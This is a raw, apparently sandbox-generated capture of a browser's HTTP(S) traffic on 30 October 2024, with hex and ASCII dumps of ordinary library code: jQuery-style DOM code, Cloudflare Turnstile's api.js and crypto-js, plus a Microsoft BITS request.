2024-10-30 15:05:33 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2024-10-30 15:05:33 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2024-10-30 15:05:33 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2024-10-30 15:05:33 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2024-10-30 15:05:33 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:33 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-30 15:05:34 UTC	494	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=25976 Date: Wed, 30 Oct 2024 15:05:34 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:34 UTC	649	OUT	GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://rpbr.ithbetoxi.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:34 UTC	471	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:34 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47672 Connection: close accept-ranges: bytes last-modified: Mon, 28 Oct 2024 19:08:47 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 8dac4de6cd24b787-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:34 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)\|\|qt(e,r)\|\|Gt(e,r)\|\|zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($\|\|($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie\|\|(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X\|\|(X={}));var
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64 Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK\|\|e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
2024-10-30 15:05:34 UTC	1369	IN	Data Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:35 UTC	386	OUT	GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:35 UTC	960	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:35 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"61182885-40eb" Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 270950 Expires: Mon, 20 Oct 2025 15:05:35 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ljjAg0UFBW%2FJ3iMS%2F0EB8C8uJvTPU9N5bEt%2FwgiBcVt%2FxJSpUyhlLWYqvDMQGyL2NwGbo2ZKqTGaU7RfQn3isMnCCmxhhVCO1Gncnm0ZH3sUHS7GOuNBREQSbBDMzdx0bXSW4ZYt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8dac4dea5e1ecb76-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:35 UTC	409	IN	Data Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 Data Ascii: of 